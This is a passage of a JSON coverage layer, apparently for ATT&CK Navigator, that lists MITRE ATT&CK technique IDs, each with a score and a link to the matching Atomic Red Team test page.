co/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.
md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://g
ithub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"commen
t":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/
redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team
/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic
-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/a
tomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanar
yco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github
.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.co
m/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/a
tomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/
blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqu
eID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T
1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github
